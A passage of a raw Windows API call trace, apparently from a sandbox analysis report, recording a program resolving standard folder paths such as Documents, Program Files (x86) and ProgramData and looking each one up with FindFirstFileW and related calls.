psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fad8*="c:\\Windows\\") returned 1 [0127.801] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x28fe38*="c:\\Windows") returned 1 [0127.802] SysReAllocStringLen (in: pbstr=0x28fe3c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fe3c*="c:\\Windows") returned 1 [0127.802] SysReAllocStringLen (in: pbstr=0x3370054*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x3370054*="c:\\Windows\\") returned 1 [0127.802] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0127.802] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\documents") returned 0x1c [0127.803] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\documents", len=0x1c | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\documents") returned 1 [0127.803] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.803] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.803] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.804] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x33700e0*="documents") returned 1 [0127.804] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.804] SysReAllocStringLen (in: pbstr=0x28fe2c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe2c*="c:\\") returned 1 [0127.804] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.804] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.804] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.805] GetLastError () returned 0x12 [0127.805] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.805] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.805] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe2c*="c:\\Users\\") returned 1 [0127.805] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.805] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.805] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.805] GetLastError () returned 0x12 [0127.805] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.806] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.806] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.806] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0127.806] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\documents" (normalized: "c:\\users\\keecfmwgj\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x114f2c0 [0127.806] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0127.806] GetLastError () returned 0x12 [0127.806] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.807] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0127.807] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents", psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0127.807] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0127.808] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0127.808] SysReAllocStringLen (in: pbstr=0x28fe30*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe30*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0127.808] SysReAllocStringLen (in: pbstr=0x3370050*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x3370050*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0127.808] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0127.809] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\public\\documents") returned 0x19 [0127.809] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\public\\documents", len=0x19 | out: pbstr=0x337009c*="c:\\users\\public\\documents") returned 1 [0127.809] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.809] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.809] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="public", len=0x6 | out: pbstr=0x33700d4*="public") returned 1 [0127.810] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x33700e0*="documents") returned 1 [0127.810] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.810] SysReAllocStringLen (in: pbstr=0x28fe20*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe20*="c:\\") returned 1 [0127.810] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.810] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.810] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.810] GetLastError () returned 0x12 [0127.810] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.811] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.829] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe20*="c:\\Users\\") returned 1 [0127.829] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="public", len=0x6 | out: pbstr=0x28fae8*="public") returned 1 [0127.829] FindFirstFileW (in: lpFileName="c:\\Users\\public" (normalized: "c:\\users\\public"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0x114f2c0 [0127.829] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0127.830] GetLastError () returned 0x12 [0127.830] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.830] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\Public", len=0xf | out: pbstr=0x28fadc*="c:\\Users\\Public") returned 1 [0127.830] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public", psz="c:\\Users\\Public\\", len=0x10 | out: pbstr=0x28fe20*="c:\\Users\\Public\\") returned 1 [0127.830] SysReAllocStringLen (in: pbstr=0x28fae8*="public", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0127.830] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\documents" (normalized: "c:\\users\\public\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x114f2c0 [0127.831] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0127.831] GetLastError () returned 0x12 [0127.831] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.831] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\Public\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fadc*="c:\\Users\\Public\\Documents") returned 1 [0127.831] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents", psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\") returned 1 [0127.832] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fad8*="c:\\Users\\Public\\Documents\\") returned 1 [0127.832] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents") returned 1 [0127.833] SysReAllocStringLen (in: pbstr=0x28fe24*=0x0, psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe24*="c:\\Users\\Public\\Documents") returned 1 [0127.833] SysReAllocStringLen (in: pbstr=0x3370068*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x3370068*="c:\\Users\\Public\\Documents\\") returned 1 [0127.833] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.834] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)", cchLength=0x16 | out: lpsz="c:\\program files (x86)") returned 0x16 [0127.834] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\program files (x86)", len=0x16 | out: pbstr=0x337009c*="c:\\program files (x86)") returned 1 [0127.834] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.835] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x3330834*="program files (x86)") returned 1 [0127.835] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.835] SysReAllocStringLen (in: pbstr=0x28fe14*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe14*="c:\\") returned 1 [0127.835] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0127.835] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x114f2c0 [0127.836] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0127.836] GetLastError () returned 0x12 [0127.836] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.836] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0127.837] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fe14*="c:\\Program Files (x86)\\") returned 1 [0127.837] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\") returned 1 [0127.837] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe14*="c:\\Program Files (x86)") returned 1 [0127.838] SysReAllocStringLen (in: pbstr=0x28fe18*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe18*="c:\\Program Files (x86)") returned 1 [0127.838] SysReAllocStringLen (in: pbstr=0x337006c*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x337006c*="c:\\Program Files (x86)\\") returned 1 [0127.838] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\ProgramData") returned 0x0 [0127.839] CharLowerBuffW (in: lpsz="C:\\ProgramData", cchLength=0xe | out: lpsz="c:\\programdata") returned 0xe [0127.839] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\programdata", len=0xe | out: pbstr=0x337009c*="c:\\programdata") returned 1 [0127.839] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.840] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="programdata", len=0xb | out: pbstr=0x3330834*="programdata") returned 1 [0127.840] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.840] SysReAllocStringLen (in: pbstr=0x28fe08*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe08*="c:\\") returned 1 [0127.840] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="programdata", len=0xb | out: pbstr=0x28fae8*="programdata") returned 1 [0127.840] FindFirstFileW (in: lpFileName="c:\\programdata" (normalized: "c:\\programdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0x114f2c0 [0127.841] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0 [0127.841] GetLastError () returned 0x12 [0127.841] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.841] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fadc*="c:\\ProgramData") returned 1 [0127.841] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData", psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fe08*="c:\\ProgramData\\") returned 1 [0127.845] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fad8*="c:\\ProgramData\\") returned 1 [0127.845] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData\\", psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe08*="c:\\ProgramData") returned 1 [0127.845] SysReAllocStringLen (in: pbstr=0x28fe0c*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe0c*="c:\\ProgramData") returned 1 [0127.845] SysReAllocStringLen (in: pbstr=0x3370070*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x3370070*="c:\\ProgramData\\") returned 1 [0127.845] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0127.846] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files", cchLength=0x23 | out: lpsz="c:\\program files (x86)\\common files") returned 0x23 [0127.846] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\program files (x86)\\common files", len=0x23 | out: pbstr=0x337009c*="c:\\program files (x86)\\common files") returned 1 [0127.846] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.846] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x3330834*="program files (x86)") returned 1 [0127.847] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="common files", len=0xc | out: pbstr=0x33700d4*="common files") returned 1 [0127.847] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.847] SysReAllocStringLen (in: pbstr=0x28fdfc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdfc*="c:\\") returned 1 [0127.847] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0127.847] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x114f2c0 [0127.847] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0127.848] GetLastError () returned 0x12 [0127.848] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.848] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0127.848] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\") returned 1 [0127.848] SysReAllocStringLen (in: pbstr=0x28fae8*="program files (x86)", psz="common files", len=0xc | out: pbstr=0x28fae8*="common files") returned 1 [0127.848] FindFirstFileW (in: lpFileName="c:\\Program Files (x86)\\common files" (normalized: "c:\\program files (x86)\\common files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0x114f2c0 [0127.849] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0 [0127.849] GetLastError () returned 0x12 [0127.849] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.849] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fadc*="c:\\Program Files (x86)\\Common 